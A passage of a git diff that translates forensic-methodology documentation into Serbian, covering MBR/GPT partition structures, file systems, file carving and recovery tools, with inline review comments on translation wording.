Ovaj boot loader ili direktno pokreće proces učitavanja drugog stepena OS-a (vidi [second-stage boot loader](https://en.wikipedia.org/wiki/Second-stage_boot_loader)) ili radi u harmoniji sa [volume boot record](https://en.wikipedia.org/wiki/Volume_boot_record) (VBR) svake particije. Za detaljno znanje, pogledajte [MBR Wikipedia page](https://en.wikipedia.org/wiki/Master_boot_record). ## References @@ -933,10 +757,4 @@ The **Master Boot Record (MBR)** plays a crucial role in managing the logical pa - [https://www.aldeid.com/wiki/Windows-userassist-keys](https://www.aldeid.com/wiki/Windows-userassist-keys) ​\* [https://learn.microsoft.com/en-us/windows/win32/fileio/master-file-table](https://learn.microsoft.com/en-us/windows/win32/fileio/master-file-table) - [https://answers.microsoft.com/en-us/windows/forum/all/uefi-based-pc-protective-mbr-what-is-it/0fc7b558-d8d4-4a7d-bae2-395455bb19aa](https://answers.microsoft.com/en-us/windows/forum/all/uefi-based-pc-protective-mbr-what-is-it/0fc7b558-d8d4-4a7d-bae2-395455bb19aa) -
- -[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. - -{% embed url="https://www.rootedcon.com/" %} - {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/README.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/README.md index 9ac27c92e..7dbfb607b 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/README.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/README.md 
@@ -4,20 +4,20 @@ ## Partitions -A hard drive or an **SSD disk can contain different partitions** with the goal of separating data physically.\ -The **minimum** unit of a disk is the **sector** (normally composed of 512B). So, each partition size needs to be multiple of that size. +Hard disk ili **SSD disk može sadržati različite particije** sa ciljem fizičkog razdvajanja podataka.\ +**Minimalna** jedinica diska je **sektor** (normalno sastavljen od 512B). Tako da, veličina svake particije mora biti višekratnik te veličine. ### MBR (master Boot Record) -It's allocated in the **first sector of the disk after the 446B of the boot code**. This sector is essential to indicate to the PC what and from where a partition should be mounted.\ -It allows up to **4 partitions** (at most **just 1** can be active/**bootable**). However, if you need more partitions you can use **extended partitions**. The **final byte** of this first sector is the boot record signature **0x55AA**. Only one partition can be marked as active.\ -MBR allows **max 2.2TB**. +Dodeljuje se u **prvom sektoru diska nakon 446B boot koda**. Ovaj sektor je ključan za indikaciju PC-u šta i odakle treba da se montira particija.\ +Omogućava do **4 particije** (najviše **samo 1** može biti aktivna/**bootable**). Međutim, ako vam je potrebno više particija, možete koristiti **proširene particije**. **Zadnji bajt** ovog prvog sektora je potpis boot zapisa **0x55AA**. Samo jedna particija može biti označena kao aktivna.\ +MBR omogućava **maksimalno 2.2TB**. ![](<../../../images/image (350).png>) ![](<../../../images/image (304).png>) -From the **bytes 440 to the 443** of the MBR you can find the **Windows Disk Signature** (if Windows is used). The logical drive letter of the hard disk depends on the Windows Disk Signature. Changing this signature could prevent Windows from booting (tool: [**Active Disk Editor**](https://www.disk-editor.org/index.html)**)**. 
+Od **bajtova 440 do 443** MBR-a možete pronaći **Windows Disk Signature** (ako se koristi Windows). Logičko slovo diska hard diska zavisi od Windows Disk Signature. Promena ovog potpisa može sprečiti Windows da se pokrene (alat: [**Active Disk Editor**](https://www.disk-editor.org/index.html)**)**. ![](<../../../images/image (310).png>) 
@@ -26,122 +26,120 @@ From the **bytes 440 to the 443** of the MBR you can find the **Windows Disk Sig | Offset | Length | Item | | ----------- | ---------- | ------------------- | | 0 (0x00) | 446(0x1BE) | Boot code | -| 446 (0x1BE) | 16 (0x10) | First Partition | -| 462 (0x1CE) | 16 (0x10) | Second Partition | -| 478 (0x1DE) | 16 (0x10) | Third Partition | -| 494 (0x1EE) | 16 (0x10) | Fourth Partition | -| 510 (0x1FE) | 2 (0x2) | Signature 0x55 0xAA | +| 446 (0x1BE) | 16 (0x10) | Prva particija | +| 462 (0x1CE) | 16 (0x10) | Druga particija | +| 478 (0x1DE) | 16 (0x10) | Treća particija | +| 494 (0x1EE) | 16 (0x10) | Četvrta particija | +| 510 (0x1FE) | 2 (0x2) | Potpis 0x55 0xAA | -**Partition Record Format** +**Format zapisa particije** | Offset | Length | Item | | --------- | -------- | ------------------------------------------------------ | -| 0 (0x00) | 1 (0x01) | Active flag (0x80 = bootable) | -| 1 (0x01) | 1 (0x01) | Start head | -| 2 (0x02) | 1 (0x01) | Start sector (bits 0-5); upper bits of cylinder (6- 7) | -| 3 (0x03) | 1 (0x01) | Start cylinder lowest 8 bits | -| 4 (0x04) | 1 (0x01) | Partition type code (0x83 = Linux) | -| 5 (0x05) | 1 (0x01) | End head | -| 6 (0x06) | 1 (0x01) | End sector (bits 0-5); upper bits of cylinder (6- 7) | -| 7 (0x07) | 1 (0x01) | End cylinder lowest 8 bits | -| 8 (0x08) | 4 (0x04) | Sectors preceding partition (little endian) | -| 12 (0x0C) | 4 (0x04) | Sectors in partition | +| 0 (0x00) | 1 (0x01) | Aktivna zastavica (0x80 = bootable) | +| 1 (0x01) | 1 (0x01) | Početna glava | +| 2 (0x02) | 1 (0x01) | Početni sektor (bitovi 0-5); gornji bitovi cilindra (6- 7) | +| 3 (0x03) | 1 (0x01) | Početni cilindar najniži 8 bitova | +| 4 (0x04) | 1 (0x01) | Kod tipa particije (0x83 = Linux) | +| 5 (0x05) | 1 (0x01) | Kraj glave | +| 6 (0x06) | 1 (0x01) | Kraj sektora (bitovi 0-5); gornji bitovi cilindra (6- 7) | +| 7 (0x07) | 1 (0x01) | Kraj cilindra najniži 8 bitova | +| 8 (0x08) | 4 (0x04) | Sektori koji prethode particiji 
(little endian) | +| 12 (0x0C) | 4 (0x04) | Sektori u particiji | -In order to mount an MBR in Linux you first need to get the start offset (you can use `fdisk` and the `p` command) +Da biste montirali MBR u Linux-u, prvo morate dobiti početni offset (možete koristiti `fdisk` i komandu `p`) ![](<../../../images/image (413) (3) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>) -And then use the following code - +A zatim koristite sledeći kod ```bash #Mount MBR in Linux mount -o ro,loop,offset= #63x512 = 32256Bytes mount -o ro,loop,offset=32256,noatime /path/to/image.dd /media/part/ ``` +**LBA (Logičko adresiranje blokova)** -**LBA (Logical block addressing)** +**Logičko adresiranje blokova** (**LBA**) je uobičajen sistem koji se koristi za **specifikaciju lokacije blokova** podataka koji se čuvaju na uređajima za skladištenje računara, obično na sekundarnim sistemima skladištenja kao što su hard diskovi. LBA je posebno jednostavan linearni sistem adresiranja; **blokovi se lociraju pomoću celobrojnog indeksa**, pri čemu je prvi blok LBA 0, drugi LBA 1, i tako dalje. -**Logical block addressing** (**LBA**) is a common scheme used for **specifying the location of blocks** of data stored on computer storage devices, generally secondary storage systems such as hard disk drives. LBA is a particularly simple linear addressing scheme; **blocks are located by an integer index**, with the first block being LBA 0, the second LBA 1, and so on. +### GPT (GUID tabela particija) -### GPT (GUID Partition Table) +GUID tabela particija, poznata kao GPT, favorizovana je zbog svojih poboljšanih mogućnosti u poređenju sa MBR (Master Boot Record). Karakteristična po svom **globalno jedinstvenom identifikatoru** za particije, GPT se izdvaja na nekoliko načina: -The GUID Partition Table, known as GPT, is favored for its enhanced capabilities compared to MBR (Master Boot Record). 
Distinctive for its **globally unique identifier** for partitions, GPT stands out in several ways: +- **Lokacija i veličina**: I GPT i MBR počinju na **sektoru 0**. Međutim, GPT radi na **64bita**, u kontrastu sa MBR-ovih 32bita. +- **Ograničenja particija**: GPT podržava do **128 particija** na Windows sistemima i može da primi do **9.4ZB** podataka. +- **Imena particija**: Omogućava imenovanje particija sa do 36 Unicode karaktera. -- **Location and Size**: Both GPT and MBR start at **sector 0**. However, GPT operates on **64bits**, contrasting with MBR's 32bits. -- **Partition Limits**: GPT supports up to **128 partitions** on Windows systems and accommodates up to **9.4ZB** of data. -- **Partition Names**: Offers the ability to name partitions with up to 36 Unicode characters. +**Otpornost podataka i oporavak**: -**Data Resilience and Recovery**: +- **Redundancija**: Za razliku od MBR-a, GPT ne ograničava particionisanje i podatke o pokretanju na jedno mesto. Replikuje ove podatke širom diska, poboljšavajući integritet i otpornost podataka. +- **Ciklična kontrola redundancije (CRC)**: GPT koristi CRC za osiguranje integriteta podataka. Aktivno prati oštećenje podataka, a kada se otkrije, GPT pokušava da povrati oštećene podatke sa druge lokacije na disku. -- **Redundancy**: Unlike MBR, GPT doesn't confine partitioning and boot data to a single place. It replicates this data across the disk, enhancing data integrity and resilience. -- **Cyclic Redundancy Check (CRC)**: GPT employs CRC to ensure data integrity. It actively monitors for data corruption, and when detected, GPT attempts to recover the corrupted data from another disk location. +**Zaštitni MBR (LBA0)**: -**Protective MBR (LBA0)**: - -- GPT maintains backward compatibility through a protective MBR. This feature resides in the legacy MBR space but is designed to prevent older MBR-based utilities from mistakenly overwriting GPT disks, hence safeguarding the data integrity on GPT-formatted disks. 
+- GPT održava unazad kompatibilnost kroz zaštitni MBR. Ova funkcija se nalazi u prostoru nasleđenog MBR-a, ali je dizajnirana da spreči starije MBR-bazirane alate da greškom prepisuju GPT diskove, čime se štiti integritet podataka na GPT-formatiranim diskovima. ![https://upload.wikimedia.org/wikipedia/commons/thumb/0/07/GUID_Partition_Table_Scheme.svg/800px-GUID_Partition_Table_Scheme.svg.png](<../../../images/image (1062).png>) -**Hybrid MBR (LBA 0 + GPT)** +**Hibridni MBR (LBA 0 + GPT)** -[From Wikipedia](https://en.wikipedia.org/wiki/GUID_Partition_Table) +[Sa Vikipedije](https://en.wikipedia.org/wiki/GUID_Partition_Table) -In operating systems that support **GPT-based boot through BIOS** services rather than EFI, the first sector may also still be used to store the first stage of the **bootloader** code, but **modified** to recognize **GPT** **partitions**. The bootloader in the MBR must not assume a sector size of 512 bytes. +U operativnim sistemima koji podržavaju **GPT-bazirano pokretanje putem BIOS** usluga umesto EFI, prvi sektor se takođe može koristiti za skladištenje prve faze **bootloader** koda, ali **modifikovan** da prepozna **GPT** **particije**. Bootloader u MBR-u ne sme da pretpostavlja veličinu sektora od 512 bajta. -**Partition table header (LBA 1)** +**Zaglavlje tabele particija (LBA 1)** -[From Wikipedia](https://en.wikipedia.org/wiki/GUID_Partition_Table) +[Sa Vikipedije](https://en.wikipedia.org/wiki/GUID_Partition_Table) -The partition table header defines the usable blocks on the disk. It also defines the number and size of the partition entries that make up the partition table (offsets 80 and 84 in the table). +Zaglavlje tabele particija definiše upotrebljive blokove na disku. Takođe definiše broj i veličinu unosa particija koji čine tabelu particija (offseti 80 i 84 u tabeli). 
-| Offset | Length | Contents | +| Offset | Dužina | Sadržaj | | --------- | -------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | -| 0 (0x00) | 8 bytes | Signature ("EFI PART", 45h 46h 49h 20h 50h 41h 52h 54h or 0x5452415020494645ULL[ ](https://en.wikipedia.org/wiki/GUID_Partition_Table#cite_note-8)on little-endian machines) | -| 8 (0x08) | 4 bytes | Revision 1.0 (00h 00h 01h 00h) for UEFI 2.8 | -| 12 (0x0C) | 4 bytes | Header size in little endian (in bytes, usually 5Ch 00h 00h 00h or 92 bytes) | -| 16 (0x10) | 4 bytes | [CRC32](https://en.wikipedia.org/wiki/CRC32) of header (offset +0 up to header size) in little endian, with this field zeroed during calculation | -| 20 (0x14) | 4 bytes | Reserved; must be zero | -| 24 (0x18) | 8 bytes | Current LBA (location of this header copy) | -| 32 (0x20) | 8 bytes | Backup LBA (location of the other header copy) | -| 40 (0x28) | 8 bytes | First usable LBA for partitions (primary partition table last LBA + 1) | -| 48 (0x30) | 8 bytes | Last usable LBA (secondary partition table first LBA − 1) | -| 56 (0x38) | 16 bytes | Disk GUID in mixed endian | -| 72 (0x48) | 8 bytes | Starting LBA of an array of partition entries (always 2 in primary copy) | -| 80 (0x50) | 4 bytes | Number of partition entries in array | -| 84 (0x54) | 4 bytes | Size of a single partition entry (usually 80h or 128) | -| 88 (0x58) | 4 bytes | CRC32 of partition entries array in little endian | -| 92 (0x5C) | \* | Reserved; must be zeroes for the rest of the block (420 bytes for a sector size of 512 bytes; but can be more with larger sector sizes) | +| 0 (0x00) | 8 bajtova| Potpis ("EFI PART", 45h 46h 49h 20h 50h 41h 52h 54h ili 0x5452415020494645ULL[ ](https://en.wikipedia.org/wiki/GUID_Partition_Table#cite_note-8) na little-endian mašinama) | +| 8 (0x08) | 4 bajta | Revizija 1.0 (00h 00h 01h 00h) za UEFI 2.8 | +| 12 (0x0C) 
| 4 bajta | Veličina zaglavlja u little endian (u bajtovima, obično 5Ch 00h 00h 00h ili 92 bajta) | +| 16 (0x10) | 4 bajta | [CRC32](https://en.wikipedia.org/wiki/CRC32) zaglavlja (offset +0 do veličine zaglavlja) u little endian, sa ovim poljem nula tokom izračunavanja | +| 20 (0x14) | 4 bajta | Rezervisano; mora biti nula | +| 24 (0x18) | 8 bajtova| Trenutni LBA (lokacija ove kopije zaglavlja) | +| 32 (0x20) | 8 bajtova| Backup LBA (lokacija druge kopije zaglavlja) | +| 40 (0x28) | 8 bajtova| Prvi upotrebljivi LBA za particije (poslednji LBA primarne tabele particija + 1) | +| 48 (0x30) | 8 bajtova| Poslednji upotrebljivi LBA (prvi LBA sekundarne tabele particija − 1) | +| 56 (0x38) | 16 bajtova| Disk GUID u mešovitom endian | +| 72 (0x48) | 8 bajtova| Početni LBA niza unosa particija (uvek 2 u primarnoj kopiji) | +| 80 (0x50) | 4 bajta | Broj unosa particija u nizu | +| 84 (0x54) | 4 bajta | Veličina jednog unosa particije (obično 80h ili 128) | +| 88 (0x58) | 4 bajta | CRC32 niza unosa particija u little endian | +| 92 (0x5C) | \* | Rezervisano; mora biti nule za ostatak bloka (420 bajtova za veličinu sektora od 512 bajta; ali može biti više sa većim veličinama sektora) | -**Partition entries (LBA 2–33)** +**Unosi particija (LBA 2–33)** -| GUID partition entry format | | | +| Format unosa GUID particije | | | | --------------------------- | -------- | ------------------------------------------------------------------------------------------------------------- | -| Offset | Length | Contents | -| 0 (0x00) | 16 bytes | [Partition type GUID](https://en.wikipedia.org/wiki/GUID_Partition_Table#Partition_type_GUIDs) (mixed endian) | -| 16 (0x10) | 16 bytes | Unique partition GUID (mixed endian) | -| 32 (0x20) | 8 bytes | First LBA ([little endian](https://en.wikipedia.org/wiki/Little_endian)) | -| 40 (0x28) | 8 bytes | Last LBA (inclusive, usually odd) | -| 48 (0x30) | 8 bytes | Attribute flags (e.g. 
bit 60 denotes read-only) | -| 56 (0x38) | 72 bytes | Partition name (36 [UTF-16](https://en.wikipedia.org/wiki/UTF-16)LE code units) | +| Offset | Dužina | Sadržaj | +| 0 (0x00) | 16 bajtova | [GUID tipa particije](https://en.wikipedia.org/wiki/GUID_Partition_Table#Partition_type_GUIDs) (mešovit endian) | +| 16 (0x10) | 16 bajtova | Jedinstveni GUID particije (mešovit endian) | +| 32 (0x20) | 8 bajtova | Prvi LBA ([little endian](https://en.wikipedia.org/wiki/Little_endian)) | +| 40 (0x28) | 8 bajtova | Poslednji LBA (uključivo, obično neparan) | +| 48 (0x30) | 8 bajtova | Zastavice atributa (npr. bit 60 označava samo za čitanje) | +| 56 (0x38) | 72 bajtova | Ime particije (36 [UTF-16](https://en.wikipedia.org/wiki/UTF-16)LE kodnih jedinica) | -**Partitions Types** +**Tipovi particija** ![](<../../../images/image (83).png>) -More partition types in [https://en.wikipedia.org/wiki/GUID_Partition_Table](https://en.wikipedia.org/wiki/GUID_Partition_Table) +Više tipova particija na [https://en.wikipedia.org/wiki/GUID_Partition_Table](https://en.wikipedia.org/wiki/GUID_Partition_Table) -### Inspecting +### Istraživanje -After mounting the forensics image with [**ArsenalImageMounter**](https://arsenalrecon.com/downloads/), you can inspect the first sector using the Windows tool [**Active Disk Editor**](https://www.disk-editor.org/index.html)**.** In the following image an **MBR** was detected on the **sector 0** and interpreted: +Nakon montiranja forenzičke slike sa [**ArsenalImageMounter**](https://arsenalrecon.com/downloads/), možete ispitati prvi sektor koristeći Windows alat [**Active Disk Editor**](https://www.disk-editor.org/index.html)**.** Na sledećoj slici je otkriven **MBR** na **sektoru 0** i interpretiran: ![](<../../../images/image (354).png>) -If it was a **GPT table instead of an MBR** it should appear the signature _EFI PART_ in the **sector 1** (which in the previous image is empty). 
+Ako je to bila **GPT tabela umesto MBR-a**, trebala bi se pojaviti oznaka _EFI PART_ u **sektoru 1** (koji je na prethodnoj slici prazan). -## File-Systems +## Sistemi datoteka -### Windows file-systems list +### Lista Windows sistema datoteka - **FAT12/16**: MSDOS, WIN95/98/NT/200 - **FAT32**: 95/2000/XP/2003/VISTA/7/8/10 
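Review bot: in the partitions README hunk above, the added heading `+### Istraživanje` ("exploration") does not match the body, which uses `ispitati` for "inspect"; `### Ispitivanje` is the closer rendering of `### Inspecting`. Two smaller wording points in the same hunk: `unazad kompatibilnost` reads more naturally as `kompatibilnost unazad`, and the added table rows drop the padding before the closing pipe (`8 bajtova|`), which still renders but loses the column alignment the English rows kept.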
@@ -151,49 +149,49 @@ If it was a **GPT table instead of an MBR** it should appear the signature _EFI ### FAT -The **FAT (File Allocation Table)** file system is designed around its core component, the file allocation table, positioned at the volume's start. This system safeguards data by maintaining **two copies** of the table, ensuring data integrity even if one is corrupted. The table, along with the root folder, must be in a **fixed location**, crucial for the system's startup process. +**FAT (Tabela alokacije datoteka)** sistem datoteka je dizajniran oko svoje osnovne komponente, tabele alokacije datoteka, koja se nalazi na početku volumena. Ovaj sistem štiti podatke održavanjem **dvije kopije** tabele, osiguravajući integritet podataka čak i ako je jedna oštećena. Tabela, zajedno sa korenskim folderom, mora biti na **fiksnoj lokaciji**, što je ključno za proces pokretanja sistema. -The file system's basic unit of storage is a **cluster, usually 512B**, comprising multiple sectors. FAT has evolved through versions: +Osnovna jedinica skladištenja sistema datoteka je **klaster, obično 512B**, koji se sastoji od više sektora. FAT se razvijao kroz verzije: -- **FAT12**, supporting 12-bit cluster addresses and handling up to 4078 clusters (4084 with UNIX). -- **FAT16**, enhancing to 16-bit addresses, thereby accommodating up to 65,517 clusters. -- **FAT32**, further advancing with 32-bit addresses, allowing an impressive 268,435,456 clusters per volume. +- **FAT12**, podržava 12-bitne adrese klastera i obrađuje do 4078 klastera (4084 sa UNIX-om). +- **FAT16**, unapređuje na 16-bitne adrese, čime se omogućava do 65,517 klastera. +- **FAT32**, dodatno napreduje sa 32-bitnim adresama, omogućavajući impresivnih 268,435,456 klastera po volumenu. -A significant limitation across FAT versions is the **4GB maximum file size**, imposed by the 32-bit field used for file size storage. 
+Značajno ograničenje kod FAT verzija je **maksimalna veličina datoteke od 4GB**, koju nameće 32-bitno polje korišćeno za skladištenje veličine datoteke. -Key components of the root directory, particularly for FAT12 and FAT16, include: +Ključne komponente korenskog direktorijuma, posebno za FAT12 i FAT16, uključuju: -- **File/Folder Name** (up to 8 characters) -- **Attributes** -- **Creation, Modification, and Last Access Dates** -- **FAT Table Address** (indicating the start cluster of the file) -- **File Size** +- **Ime datoteke/foldera** (do 8 karaktera) +- **Atributi** +- **Datumi kreiranja, modifikacije i poslednjeg pristupa** +- **Adresa FAT tabele** (koja označava početni klaster datoteke) +- **Veličina datoteke** ### EXT -**Ext2** is the most common file system for **not journaling** partitions (**partitions that don't change much**) like the boot partition. **Ext3/4** are **journaling** and are used usually for the **rest partitions**. +**Ext2** je najčešći sistem datoteka za **ne-journal** particije (**particije koje se ne menjaju mnogo**) kao što je particija za pokretanje. **Ext3/4** su **journal** i obično se koriste za **ostale particije**. -## **Metadata** +## **Metapodaci** -Some files contain metadata. This information is about the content of the file which sometimes might be interesting to an analyst as depending on the file type, it might have information like: +Neke datoteke sadrže metapodatke. 
Ove informacije se odnose na sadržaj datoteke koji ponekad može biti zanimljiv analitičaru jer, u zavisnosti od tipa datoteke, može sadržati informacije kao što su: -- Title -- MS Office Version used -- Author -- Dates of creation and last modification -- Model of the camera -- GPS coordinates -- Image information +- Naslov +- Verzija MS Office-a koja se koristi +- Autor +- Datumi kreiranja i poslednje modifikacije +- Model kamere +- GPS koordinate +- Informacije o slici -You can use tools like [**exiftool**](https://exiftool.org) and [**Metadiver**](https://www.easymetadata.com/metadiver-2/) to get the metadata of a file. +Možete koristiti alate kao što su [**exiftool**](https://exiftool.org) i [**Metadiver**](https://www.easymetadata.com/metadiver-2/) da dobijete metapodatke datoteke. -## **Deleted Files Recovery** +## **Oporavak obrisanih datoteka** -### Logged Deleted Files +### Zabeležene obrisane datoteke -As was seen before there are several places where the file is still saved after it was "deleted". This is because usually the deletion of a file from a file system just marks it as deleted but the data isn't touched. Then, it's possible to inspect the registries of the files (like the MFT) and find the deleted files. +Kao što je ranije viđeno, postoji nekoliko mesta gde je datoteka još uvek sačuvana nakon što je "obrisana". To je zato što obično brisanje datoteke iz sistema datoteka samo označava da je obrisana, ali podaci nisu dodirnuti. Tada je moguće ispitati registre datoteka (kao što je MFT) i pronaći obrisane datoteke. -Also, the OS usually saves a lot of information about file system changes and backups, so it's possible to try to use them to recover the file or as much information as possible. +Takođe, OS obično čuva mnogo informacija o promenama u sistemu datoteka i rezervnim kopijama, tako da je moguće pokušati da ih iskoristite za oporavak datoteke ili što više informacija. {{#ref}} file-data-carving-recovery-tools.md 
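Review bot: `+...održavanjem **dvije kopije** tabele` in the FAT paragraph uses the ijekavian form `dvije`, while the rest of this translation is ekavian (`dve verzije` in the pcap README hunk, `poslednji`, `mesto` throughout); change to `dve kopije`. The cluster counts `65,517` and `268,435,456` in the same list also keep the English thousands separator, while `4078` and `4084` two lines above have none; drop the commas or apply one convention to all four figures.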
@@ -201,11 +199,11 @@ file-data-carving-recovery-tools.md ### **File Carving** -**File carving** is a technique that tries to **find files in the bulk of data**. There are 3 main ways tools like this work: **Based on file types headers and footers**, based on file types **structures** and based on the **content** itself. +**File carving** je tehnika koja pokušava da **pronađe datoteke u masi podataka**. Postoje 3 glavna načina na koje alati poput ovog funkcionišu: **Na osnovu zaglavlja i podnožja tipova datoteka**, na osnovu **struktura** tipova datoteka i na osnovu **sadržaja** same datoteke. -Note that this technique **doesn't work to retrieve fragmented files**. If a file **isn't stored in contiguous sectors**, then this technique won't be able to find it or at least part of it. +Napomena da ova tehnika **ne funkcioniše za vraćanje fragmentisanih datoteka**. Ako datoteka **nije smeštena u kontiguitetne sektore**, tada ova tehnika neće moći da je pronađe ili barem deo nje. -There are several tools that you can use for file Carving indicating the file types you want to search for +Postoji nekoliko alata koje možete koristiti za file carving koji označavaju tipove datoteka koje želite da pretražujete. {{#ref}} file-data-carving-recovery-tools.md 
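Review bot: `+... nije smeštena u kontiguitetne sektore` is a calque of "contiguous"; `uzastopne sektore` (or `susedne sektore`) is the idiomatic term and is what a Serbian reader would search for. In the same hunk `+Napomena da ova tehnika...` is not a complete sentence; `Imajte na umu da ova tehnika...` matches the English "Note that".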
@@ -213,24 +211,24 @@ file-data-carving-recovery-tools.md ### Data Stream **C**arving -Data Stream Carving is similar to File Carving but **instead of looking for complete files, it looks for interesting fragments** of information.\ -For example, instead of looking for a complete file containing logged URLs, this technique will search for URLs. +Data Stream Carving je sličan File Carving-u, ali **umesto da traži kompletne datoteke, traži zanimljive fragmente** informacija.\ +Na primer, umesto da traži kompletnu datoteku koja sadrži zabeležene URL-ove, ova tehnika će tražiti URL-ove. {{#ref}} file-data-carving-recovery-tools.md {{#endref}} -### Secure Deletion +### Sigurno brisanje -Obviously, there are ways to **"securely" delete files and part of logs about them**. For example, it's possible to **overwrite the content** of a file with junk data several times, and then **remove** the **logs** from the **$MFT** and **$LOGFILE** about the file, and **remove the Volume Shadow Copies**.\ -You may notice that even performing that action there might be **other parts where the existence of the file is still logged**, and that's true and part of the forensics professional job is to find them. +Očigledno, postoje načini da se **"sigurno" obrišu datoteke i deo logova o njima**. Na primer, moguće je **prepisati sadržaj** datoteke sa smešnim podacima nekoliko puta, a zatim **ukloniti** **logove** iz **$MFT** i **$LOGFILE** o datoteci, i **ukloniti kopije senki volumena**.\ +Možda ćete primetiti da čak i obavljanjem te akcije može postojati **drugi delovi gde je postojanje datoteke još uvek zabeleženo**, i to je tačno, a deo posla forenzičkog stručnjaka je da ih pronađe. 
-## References +## Reference - [https://en.wikipedia.org/wiki/GUID_Partition_Table](https://en.wikipedia.org/wiki/GUID_Partition_Table) - [http://ntfs.com/ntfs-permissions.htm](http://ntfs.com/ntfs-permissions.htm) - [https://www.osforensics.com/faqs-and-tutorials/how-to-scan-ntfs-i30-entries-deleted-files.html](https://www.osforensics.com/faqs-and-tutorials/how-to-scan-ntfs-i30-entries-deleted-files.html) - [https://docs.microsoft.com/en-us/windows-server/storage/file-server/volume-shadow-copy-service](https://docs.microsoft.com/en-us/windows-server/storage/file-server/volume-shadow-copy-service) -- **iHackLabs Certified Digital Forensics Windows** +- **iHackLabs Sertifikovani Digitalni Forenzik Windows** {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md index 1920c497a..edf53bdbc 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md 
@@ -2,94 +2,86 @@ {{#include ../../../banners/hacktricks-training.md}} -## Carving & Recovery tools +## Alati za carving i oporavak -More tools in [https://github.com/Claudio-C/awesome-datarecovery](https://github.com/Claudio-C/awesome-datarecovery) +Više alata na [https://github.com/Claudio-C/awesome-datarecovery](https://github.com/Claudio-C/awesome-datarecovery) ### Autopsy -The most common tool used in forensics to extract files from images is [**Autopsy**](https://www.autopsy.com/download/). Download it, install it and make it ingest the file to find "hidden" files. Note that Autopsy is built to support disk images and other kinds of images, but not simple files. +Najčešće korišćen alat u forenzici za ekstrakciju fajlova iz slika je [**Autopsy**](https://www.autopsy.com/download/). Preuzmite ga, instalirajte i omogućite mu da unese fajl kako bi pronašao "sakrivene" fajlove. Imajte na umu da je Autopsy napravljen da podržava disk slike i druge vrste slika, ali ne i jednostavne fajlove. ### Binwalk -**Binwalk** is a tool for analyzing binary files to find embedded content. It's installable via `apt` and its source is on [GitHub](https://github.com/ReFirmLabs/binwalk). - -**Useful commands**: +**Binwalk** je alat za analizu binarnih fajlova radi pronalaženja ugrađenog sadržaja. Može se instalirati putem `apt`, a njegov izvor je na [GitHub](https://github.com/ReFirmLabs/binwalk). +**Korisne komande**: ```bash sudo apt install binwalk #Insllation binwalk file #Displays the embedded data in the given file binwalk -e file #Displays and extracts some files from the given file binwalk --dd ".*" file #Displays and extracts all files from the given file ``` - ### Foremost -Another common tool to find hidden files is **foremost**. You can find the configuration file of foremost in `/etc/foremost.conf`. If you just want to search for some specific files uncomment them. If you don't uncomment anything foremost will search for its default configured file types. 
- +Još jedan uobičajen alat za pronalaženje skrivenih fajlova je **foremost**. Možete pronaći konfiguracioni fajl foremost-a u `/etc/foremost.conf`. Ako želite da pretražujete samo neke specifične fajlove, otkomentarišite ih. Ako ne otkomentarišete ništa, foremost će pretraživati svoje podrazumevane konfiguracione tipove fajlova. ```bash sudo apt-get install foremost foremost -v -i file.img -o output #Discovered files will appear inside the folder "output" ``` - ### **Scalpel** -**Scalpel** is another tool that can be used to find and extract **files embedded in a file**. In this case, you will need to uncomment from the configuration file (_/etc/scalpel/scalpel.conf_) the file types you want it to extract. - +**Scalpel** je još jedan alat koji se može koristiti za pronalaženje i ekstrakciju **datoteka ugrađenih u datoteku**. U ovom slučaju, potrebno je da odkomentarišete tipove datoteka iz konfiguracione datoteke (_/etc/scalpel/scalpel.conf_) koje želite da ekstraktujete. ```bash sudo apt-get install scalpel scalpel file.img -o output ``` - ### Bulk Extractor -This tool comes inside kali but you can find it here: [https://github.com/simsong/bulk_extractor](https://github.com/simsong/bulk_extractor) - -This tool can scan an image and will **extract pcaps** inside it, **network information (URLs, domains, IPs, MACs, mails)** and more **files**. You only have to do: +Ovaj alat dolazi unutar kali, ali ga možete pronaći ovde: [https://github.com/simsong/bulk_extractor](https://github.com/simsong/bulk_extractor) +Ovaj alat može skenirati sliku i **izvući pcaps** unutar nje, **mrežne informacije (URL-ovi, domene, IP adrese, MAC adrese, e-mailovi)** i još **datoteka**. 
Samo treba da uradite: ``` bulk_extractor memory.img -o out_folder ``` - -Navigate through **all the information** that the tool has gathered (passwords?), **analyse** the **packets** (read[ **Pcaps analysis**](../pcap-inspection/)), search for **weird domains** (domains related to **malware** or **non-existent**). +Navigirajte kroz **sve informacije** koje je alat prikupio (lozinke?), **analizirajte** **pakete** (pročitajte [**analizu Pcaps**](../pcap-inspection/)), pretražujte **čudne domene** (domene povezane sa **malverom** ili **nepostojećim**). ### PhotoRec -You can find it in [https://www.cgsecurity.org/wiki/TestDisk_Download](https://www.cgsecurity.org/wiki/TestDisk_Download) +Možete ga pronaći na [https://www.cgsecurity.org/wiki/TestDisk_Download](https://www.cgsecurity.org/wiki/TestDisk_Download) -It comes with GUI and CLI versions. You can select the **file-types** you want PhotoRec to search for. +Dolazi sa GUI i CLI verzijama. Možete odabrati **tipove fajlova** koje želite da PhotoRec pretražuje. ![](<../../../images/image (242).png>) ### binvis -Check the [code](https://code.google.com/archive/p/binvis/) and the [web page tool](https://binvis.io/#/). +Proverite [kod](https://code.google.com/archive/p/binvis/) i [web stranicu 